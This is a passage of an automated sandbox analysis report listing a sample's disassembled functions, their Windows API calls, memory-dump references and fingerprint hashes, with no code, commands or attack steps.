                                                                                                                                                                            • Opcode Fuzzy Hash: 94551cc92b48180fc16bce61140b4eded8f4082999a98def4349f1b4ee7fd84d
                                                                                                                                                                            • Instruction Fuzzy Hash: 9CC00271518200FFCB05CF58E948E1ABBB6FB95311F51C559F05986030C331D960DB62
                                                                                                                                                                            Function 0024E8D9 Relevance: 1.5, APIs: 1, Instructions: 5fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • SetEndOfFile.KERNELBASE(?,0024D115,?,?,?,?,?,?,?), ref: 0024E8DC
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: File
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 749574446-0
                                                                                                                                                                            • Opcode ID: 9648cc4df923d6310576d62bb68d32efb961fe15f3a86a0b3ba27905b4748efd
                                                                                                                                                                            • Instruction ID: 08bb7591e0a321bab286be023099727bf3476a117c74409e7db1ecbfb9fdbe80
                                                                                                                                                                            • Opcode Fuzzy Hash: 9648cc4df923d6310576d62bb68d32efb961fe15f3a86a0b3ba27905b4748efd
                                                                                                                                                                            • Instruction Fuzzy Hash: 4BA00130201115CB9A411B31EE09A0E7A6ABF4169972980A8A40989071EB2688A2AA81
                                                                                                                                                                            Function 0024DE50 Relevance: 1.3, APIs: 1, Instructions: 28COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • CloseHandle.KERNELBASE(?,?,00000001,0024DE10,6294DA82,?,00000000,002793B1,000000FF,?,0024BEA6,?), ref: 0024DE6B
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseHandle
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2962429428-0
                                                                                                                                                                            • Opcode ID: 665f3b2994bf3b97cb44456a343224c0a77978713a878f4d7359774b53d25571
                                                                                                                                                                            • Instruction ID: 98f7822124d75693ffed2a936710fac85e19399f9a7aaefbe40670d71ab293f4
                                                                                                                                                                            • Opcode Fuzzy Hash: 665f3b2994bf3b97cb44456a343224c0a77978713a878f4d7359774b53d25571
                                                                                                                                                                            • Instruction Fuzzy Hash: C5F0A770562F02DFE7389E34D418353B7E46B21334F044B1DD1F6465E4C3B0A9A99B50

                                                                                                                                                                            Non-executed Functions

                                                                                                                                                                            Function 00249B5C Relevance: 23.3, APIs: 9, Strings: 4, Instructions: 577fileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00249CB1
                                                                                                                                                                              • Part of subcall function 0024AC11: GetCurrentProcess.KERNEL32(00000020,?), ref: 0024AC2E
                                                                                                                                                                              • Part of subcall function 0024AC11: GetLastError.KERNEL32 ref: 0024AC72
                                                                                                                                                                              • Part of subcall function 0024AC11: CloseHandle.KERNEL32(?), ref: 0024AC81
                                                                                                                                                                              • Part of subcall function 00242F45: _wcslen.LIBCMT ref: 00242F50
                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,40000000,00000000,00000000,00000001,00000080,00000000,?,00000000,?,00000001,?,00000000,00000000,?,\??\), ref: 00249EE1
                                                                                                                                                                            • CloseHandle.KERNEL32(00000000,?,?,?,?,?,?,?,?,?,6294E5CA,00279937,000000FF), ref: 00249F1E
                                                                                                                                                                            • CreateFileW.KERNEL32(00000000,C0000000,00000000,00000000,00000003,02200000,00000000,?,00000000,?,00000000,?,00000001,?,00000000,00000000), ref: 0024A0BF
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                            • DeviceIoControl.KERNEL32(00000000,000900A4,?,-00000008,00000000,00000000,?,00000000), ref: 0024A127
                                                                                                                                                                            • CloseHandle.KERNEL32(?,?,?,?,?,?,?,?,?,?,6294E5CA,00279937,000000FF), ref: 0024A134
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,?,?,?,?,?,?,?,6294E5CA,00279937,000000FF), ref: 0024A14A
                                                                                                                                                                            • RemoveDirectoryW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,6294E5CA,00279937,000000FF), ref: 0024A18E
                                                                                                                                                                            • DeleteFileW.KERNEL32(00000000,00000009,?,?,?,?,?,?,?,?,?,6294E5CA,00279937,000000FF), ref: 0024A196
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: CloseFileHandle_wcslen$CreateErrorLast$ControlCurrentDeleteDeviceDirectoryProcessRemove
                                                                                                                                                                            • String ID: SeCreateSymbolicLinkPrivilege$SeRestorePrivilege$UNC\$\??\
                                                                                                                                                                            • API String ID: 3517300771-3508440684
                                                                                                                                                                            • Opcode ID: c2125ea50bf7f3aa1ed31dc8857b42158c0879ce3186ebca3ca4133756f26f10
                                                                                                                                                                            • Instruction ID: 6a494180fb02775b782b50a0e9b032b0fb7b61dc2fc18dfca5ea4ed7c3129a29
                                                                                                                                                                            • Opcode Fuzzy Hash: c2125ea50bf7f3aa1ed31dc8857b42158c0879ce3186ebca3ca4133756f26f10
                                                                                                                                                                            • Instruction Fuzzy Hash: 05327071920289DFDF28DFA4CC85BEE77B8BF15310F144119E849E7281DB749AA8CB61
                                                                                                                                                                            Function 00261630 Relevance: 21.3, APIs: 9, Strings: 3, Instructions: 275windowfileCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • __EH_prolog3_GS.LIBCMT ref: 0026163A
                                                                                                                                                                              • Part of subcall function 00241E44: GetDlgItem.USER32(00000000,00003021), ref: 00241E88
                                                                                                                                                                              • Part of subcall function 00241E44: SetWindowTextW.USER32(00000000,0027C6C8), ref: 00241E9E
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000171,00000000,00000000), ref: 002616BB
                                                                                                                                                                            • EndDialog.USER32(?,00000006), ref: 002616CE
                                                                                                                                                                            • GetDlgItem.USER32(?,0000006C), ref: 002616EA
                                                                                                                                                                            • SetFocus.USER32(00000000), ref: 002616F1
                                                                                                                                                                              • Part of subcall function 002414A7: _wcslen.LIBCMT ref: 002414B8
                                                                                                                                                                              • Part of subcall function 00241DE7: SetDlgItemTextW.USER32(?,?,?), ref: 00241DFC
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000066,00000170,?,00000000), ref: 00261763
                                                                                                                                                                            • FindFirstFileW.KERNEL32(?,?), ref: 00261783
                                                                                                                                                                            • FindClose.KERNEL32(00000000,?,00000000,00000000,00000000,00000099,?,?,00000000), ref: 00261826
                                                                                                                                                                            • SendDlgItemMessageW.USER32(?,00000067,00000170,?,00000000), ref: 002618AD
                                                                                                                                                                              • Part of subcall function 00241150: _wcslen.LIBCMT ref: 0024115B
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Item$MessageSend$FindText_wcslen$CloseDialogFileFirstFocusH_prolog3_Window
                                                                                                                                                                            • String ID: %s %s$REPLACEFILEDLG$`!>uJ&
                                                                                                                                                                            • API String ID: 485132379-2925523198
                                                                                                                                                                            • Opcode ID: fb0d5c580aad3434acb9e5c811e81dc077126b794feee0dca134300cab7e6826
                                                                                                                                                                            • Instruction ID: 2c274095bdb49ad0a824942eab1a9b81019e1eb8c580cc2d3f63d1e4955c4a32
                                                                                                                                                                            • Opcode Fuzzy Hash: fb0d5c580aad3434acb9e5c811e81dc077126b794feee0dca134300cab7e6826
                                                                                                                                                                            • Instruction Fuzzy Hash: C1A1A071920228EADB25EBA0CC4AFEEB77DAF15700F0441D5B549A3181DA706FB8CF61
                                                                                                                                                                            Function 0027480E Relevance: 10.1, APIs: 1, Strings: 4, Instructions: 1381COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: __floor_pentium4
                                                                                                                                                                            • String ID: 1#IND$1#INF$1#QNAN$1#SNAN
                                                                                                                                                                            • API String ID: 4168288129-2761157908
                                                                                                                                                                            • Opcode ID: 68d92ca8249faba74cb4eecd410d6296a78846366a5969f117f71f7acc8f1666
                                                                                                                                                                            • Instruction ID: 30b94a79de973fb12cbe59160fa2be8383e05befa21cab675548b0b40eea12e1
                                                                                                                                                                            • Opcode Fuzzy Hash: 68d92ca8249faba74cb4eecd410d6296a78846366a5969f117f71f7acc8f1666
                                                                                                                                                                            • Instruction Fuzzy Hash: 00C25C71E256298FDB25DF28DD407EAB3B9EB44305F1481EAD84DE7240E7B4AE918F40
                                                                                                                                                                            Function 00243D9D Relevance: 6.1, APIs: 2, Strings: 1, Instructions: 857COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • _strlen.LIBCMT ref: 0024438C
                                                                                                                                                                            • __ehfuncinfo$??2@YAPAXIABUnothrow_t@std@@@Z.LIBCMT ref: 00244523
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: Unothrow_t@std@@@__ehfuncinfo$??2@_strlen
                                                                                                                                                                            • String ID: CMT
                                                                                                                                                                            • API String ID: 2172594012-2756464174
                                                                                                                                                                            • Opcode ID: 024f92160234357f4675720b9ed7e555adadd8fc77eb4caba2a0d36b3aa8002c
                                                                                                                                                                            • Instruction ID: 59362b00e2c5e08de8899b9530da29ea4bef1fa9c2e0f2e1397fa4375657d2c2
                                                                                                                                                                            • Opcode Fuzzy Hash: 024f92160234357f4675720b9ed7e555adadd8fc77eb4caba2a0d36b3aa8002c
                                                                                                                                                                            • Instruction Fuzzy Hash: A472E271A203458FCB1CDF68C8957EA7BA5BF15300F08457DEC5A9B282DB70A969CB60
                                                                                                                                                                            Function 00266878 Relevance: 6.1, APIs: 4, Instructions: 73COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsProcessorFeaturePresent.KERNEL32(00000017), ref: 00266884
                                                                                                                                                                            • IsDebuggerPresent.KERNEL32 ref: 00266950
                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000), ref: 00266970
                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?), ref: 0026697A
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterPresentUnhandled$DebuggerFeatureProcessor
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 254469556-0
                                                                                                                                                                            • Opcode ID: 8e496fd1d4e713cd29506b0d83bdf61783d8d091ed37f87234de09a1526d0e65
                                                                                                                                                                            • Instruction ID: 8fe12372ef4f9f8db51dc0e5543dd984bf0faadc3070b9e755c45732298883e6
                                                                                                                                                                            • Opcode Fuzzy Hash: 8e496fd1d4e713cd29506b0d83bdf61783d8d091ed37f87234de09a1526d0e65
                                                                                                                                                                            • Instruction Fuzzy Hash: FF3125B5D552199BDB21DFA5D98DBCCBBB8BF08304F1041EAE40CAB250EB759AC48F44
                                                                                                                                                                            Function 0024932C Relevance: 6.0, APIs: 4, Instructions: 36windowCOMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLastError.KERNEL32(?,?,0024952D,?,00000040,0024931E,00000001,?,?,?,?,0000001C,00257618,0028E0C8,WaitForMultipleObjects error %d, GetLastError %d,000000FF), ref: 00249330
                                                                                                                                                                            • FormatMessageW.KERNEL32(00001300,00000000,00000000,00000400,00000000,00000000,00000000,?,?,0024952D,?,00000040,0024931E,00000001,?,?), ref: 00249351
                                                                                                                                                                            • _wcslen.LIBCMT ref: 00249360
                                                                                                                                                                            • LocalFree.KERNEL32(00000000,00000000,00000000,0028E0C8,?,?,0024952D,?,00000040,0024931E,00000001,?,?,?,?,0000001C), ref: 00249373
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ErrorFormatFreeLastLocalMessage_wcslen
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 991192900-0
                                                                                                                                                                            • Opcode ID: 7c22db44fa3c7ae2c7942e36b74159ae41c3f3327eb2410e02b732df524bec87
                                                                                                                                                                            • Instruction ID: ac9db88f2d65e37d5d7eeb4ee61231dd18b9cc31268f2d37f935fe3d07d96921
                                                                                                                                                                            • Opcode Fuzzy Hash: 7c22db44fa3c7ae2c7942e36b74159ae41c3f3327eb2410e02b732df524bec87
                                                                                                                                                                            • Instruction Fuzzy Hash: 75F0AE75510104FBDB089F719D09DFF777CEF857507108059F502A6190CA709E91DAB4
                                                                                                                                                                            Function 00264E14 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 49COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • VirtualQuery.KERNEL32(80000000,00264D59,0000001C,00264F4E,00000000,?,?,?,?,?,?,?,00264D59,00000004,00295D84,00264FDE), ref: 00264E25
                                                                                                                                                                            • GetSystemInfo.KERNEL32(?,?,00000000,?,?,?,?,00264D59,00000004,00295D84,00264FDE), ref: 00264E40
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: InfoQuerySystemVirtual
                                                                                                                                                                            • String ID: D
                                                                                                                                                                            • API String ID: 401686933-2746444292
                                                                                                                                                                            • Opcode ID: cb682d4ea11e4119493c8de977e1211056a9697bb1dbd94d26c1442a2b504b11
                                                                                                                                                                            • Instruction ID: fd84ccba225e1ded0812f5558f6ab166a7e748ab7edbc1e26b8358e82915ce04
                                                                                                                                                                            • Opcode Fuzzy Hash: cb682d4ea11e4119493c8de977e1211056a9697bb1dbd94d26c1442a2b504b11
                                                                                                                                                                            • Instruction Fuzzy Hash: 8601F7326101096BCB14EE29DC05BEE7BAAAFC4328F0CC125ED5DDB254D735D851C680
                                                                                                                                                                            Function 0026AAC4 Relevance: 4.6, APIs: 3, Instructions: 78COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • IsDebuggerPresent.KERNEL32(?,?,?,?,?,0026535E), ref: 0026ABBC
                                                                                                                                                                            • SetUnhandledExceptionFilter.KERNEL32(00000000,?,?,?,?,?,0026535E), ref: 0026ABC6
                                                                                                                                                                            • UnhandledExceptionFilter.KERNEL32(?,?,?,?,?,?,0026535E), ref: 0026ABD3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: ExceptionFilterUnhandled$DebuggerPresent
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 3906539128-0
                                                                                                                                                                            • Opcode ID: c2421a916558637fb5d8c5441dee285d5ceb591928479661535d77f5f7f87f7f
                                                                                                                                                                            • Instruction ID: dc31a93e4363fd27d4619eaf1453783316507215f8c81c77f792d0c8f846c0ea
                                                                                                                                                                            • Opcode Fuzzy Hash: c2421a916558637fb5d8c5441dee285d5ceb591928479661535d77f5f7f87f7f
                                                                                                                                                                            • Instruction Fuzzy Hash: 8631D274911229ABCB21DF64D9887DCBBB8BF08310F5041EAE81CA7261EB709FD18F45
                                                                                                                                                                            Function 00271FF8 Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 114COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Strings
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID: .
                                                                                                                                                                            • API String ID: 0-248832578
                                                                                                                                                                            • Opcode ID: d30359daa7dea207329e50a4be5e6a38420bd90ed85df9ea73ad2af2804b487d
                                                                                                                                                                            • Instruction ID: bce7478c3e22911833a8323c70a8d9b334e73a43fcef8513deeb152f6cb192ea
                                                                                                                                                                            • Opcode Fuzzy Hash: d30359daa7dea207329e50a4be5e6a38420bd90ed85df9ea73ad2af2804b487d
                                                                                                                                                                            • Instruction Fuzzy Hash: 9A310971810109AFDB249E78CC84DFB7BBDDF55304F044198F91C97251E6319D54CB60
                                                                                                                                                                            Function 00274360 Relevance: 3.5, APIs: 2, Instructions: 464COMMONLIBRARYCODE
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID:
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID:
                                                                                                                                                                            • Opcode ID: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                                                                                                                                            • Instruction ID: 7dc99eedf8c4ce8430b51e5aea1e4996386f612223ecede46d0a9a8193d1e4fb
                                                                                                                                                                            • Opcode Fuzzy Hash: 9e76feb55238aef6f2104d7f35b4c35741b7a6e088d7c6c091e67f68abddc892
                                                                                                                                                                            • Instruction Fuzzy Hash: BE024C71E1021A9BDF14DFA9C8806ADF7F5EF49314F258269D919E7340D730AA51CB90
                                                                                                                                                                            Function 0025FD34 Relevance: 3.1, APIs: 2, Instructions: 51COMMON
                                                                                                                                                                            Download Yara Rule
                                                                                                                                                                            APIs
                                                                                                                                                                            • GetLocaleInfoW.KERNEL32(00000400,0000000F,?,00000064), ref: 0025FD6A
                                                                                                                                                                            • GetNumberFormatW.KERNEL32(00000400,00000000,?,00289714,?,?), ref: 0025FDB3
                                                                                                                                                                            Memory Dump Source
                                                                                                                                                                            • Source File: 00000000.00000002.1550320659.0000000000241000.00000020.00000001.01000000.00000003.sdmp, Offset: 00240000, based on PE: true
                                                                                                                                                                            • Associated: 00000000.00000002.1550289083.0000000000240000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550374512.000000000027C000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000289000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550399357.0000000000292000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            • Associated: 00000000.00000002.1550444426.0000000000297000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                                                                                            Joe Sandbox IDA Plugin
                                                                                                                                                                            • Snapshot File: hcaresult_0_2_240000_FX6KTgnipP.jbxd
                                                                                                                                                                            Similarity
                                                                                                                                                                            • API ID: FormatInfoLocaleNumber
                                                                                                                                                                            • String ID:
                                                                                                                                                                            • API String ID: 2169056816-0
                                                                                                                                                                            • Opcode ID: e0197c09b8f3bf96fb76732ba088409bf9bdf3d854c770e0e085a7d10f5e87ea
